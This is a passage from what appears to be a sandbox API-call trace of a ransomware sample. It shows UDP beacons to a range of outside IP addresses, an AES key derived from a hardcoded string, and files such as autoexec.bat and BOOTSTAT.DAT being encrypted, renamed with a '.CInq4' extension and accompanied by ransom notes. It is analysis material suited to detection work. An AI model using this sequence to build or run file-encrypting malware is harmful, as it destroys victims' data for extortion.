returned 353 [0040.089] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.217"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.089] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.218"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.089] sendto (in: s=0xcc, buf=0x379dc0*, len=353, flags=0, to=0x1cf9a4*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.219"), tolen=16 | out: buf=0x379dc0*) returned 353 [0040.139] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x11c13e0, phModule=0x37af04 | out: phModule=0x37af04*=0x11c0000) returned 1 [0040.139] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x11e722b, lpParameter=0x37aef8, dwCreationFlags=0x0, lpThreadId=0x1cf96c | out: lpThreadId=0x1cf96c*=0xa8c) returned 0xc0 [0040.139] SleepConditionVariableSRW (in: ConditionVariable=0x379f54, SRWLock=0x37c828, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x379f54, SRWLock=0x37c828) returned 1 [0040.141] GetCurrentThreadId () returned 0xa80 [0040.142] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x769f0000 [0040.142] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0040.142] GetProcAddress (hModule=0x769f0000, lpProcName="CryptDestroyHash") returned 0x769fdf66 [0040.142] GetProcAddress (hModule=0x769f0000, lpProcName="CryptDestroyKey") returned 0x769fc51a [0040.142] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0040.142] CryptAcquireContextW (in: phProv=0x1cf9a4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1cf9a4*=0x38bc60) returned 1 [0040.142] GetProcAddress (hModule=0x769f0000, lpProcName="CryptCreateHash") returned 0x769fdf4e [0040.142] CryptCreateHash (in: hProv=0x38bc60, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1cf9ac | out: phHash=0x1cf9ac) returned 1 [0040.143] GetProcAddress (hModule=0x769f0000, lpProcName="CryptHashData") returned 0x769fdf36 [0040.143] lstrlenW (lpString="ZKfKKI179zSG7yHIQNucmsK") returned 23 [0040.143] CryptHashData (hHash=0x387ef0, pbData=0x37c820, dwDataLen=0x17, dwFlags=0x0) returned 1 [0040.143] GetProcAddress (hModule=0x769f0000, lpProcName="CryptDeriveKey") returned 0x76a33188 [0040.143] CryptDeriveKey (in: hProv=0x38bc60, Algid=0x660e, hBaseData=0x387ef0, dwFlags=0x0, phKey=0x1cf9a8 | out: phKey=0x1cf9a8*=0x37bd80) returned 1 [0040.144] GetProcAddress (hModule=0x769f0000, lpProcName="CryptEncrypt") returned 0x76a1779b [0040.144] CryptDestroyHash (hHash=0x387ef0) returned 1 [0040.144] CreateFileW (lpFileName="c:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0040.144] CreateFileW (lpFileName="c:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0040.145] ReadFile (in: hFile=0xc4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x18, lpOverlapped=0x0) returned 1 [0040.146] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x18, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x20) returned 1 [0040.146] WriteFile (in: hFile=0xb8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x20, lpOverlapped=0x0) returned 1 [0040.146] CloseHandle (hObject=0xc4) returned 1 [0040.147] CloseHandle (hObject=0xb8) returned 1 [0040.148] GetCurrentThreadId () returned 0xa80 [0040.148] GetCurrentThreadId () returned 0xa80 [0040.148] MoveFileW (lpExistingFileName="c:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), lpNewFileName="c:\\autoexec.bat.CInq4" (normalized: "c:\\autoexec.bat.cinq4")) returned 1 [0040.148] CreateFileW (lpFileName="c:\\(_H0W_TO_REC0VER_CInq4.txt" (normalized: "c:\\(_h0w_to_rec0ver_cinq4.txt"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0040.149] WriteFile (in: hFile=0xb8, lpBuffer=0x398c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x398c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.150] CloseHandle (hObject=0xb8) returned 1 [0040.151] CreateFileW (lpFileName="c:\\(_H0W_TO_REC0VER_CInq4.html" (normalized: "c:\\(_h0w_to_rec0ver_cinq4.html"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0040.151] WriteFile (in: hFile=0xb8, lpBuffer=0x398aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x398aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.152] CloseHandle (hObject=0xb8) returned 1 [0040.153] CreateFileW (lpFileName="c:\\(_H0W_TO_REC0VER_CInq4.url" (normalized: "c:\\(_h0w_to_rec0ver_cinq4.url"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0040.153] WriteFile (in: hFile=0xb8, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.154] CloseHandle (hObject=0xb8) returned 1 [0040.154] CreateFileW (lpFileName="c:\\boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0040.155] CloseHandle (hObject=0xffffffff) returned 0 [0040.155] CreateFileW (lpFileName="c:\\boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0040.155] CreateFileW (lpFileName="c:\\boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0040.155] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.157] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.157] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.157] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.157] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.157] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.157] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.157] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.157] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.157] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.157] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.157] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.157] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.157] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.157] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.158] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.158] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.158] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.158] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.158] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.158] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.158] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.158] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.158] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.159] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.159] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.159] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.159] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.159] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.159] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.159] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.159] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.159] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.159] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.159] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.160] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.160] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, 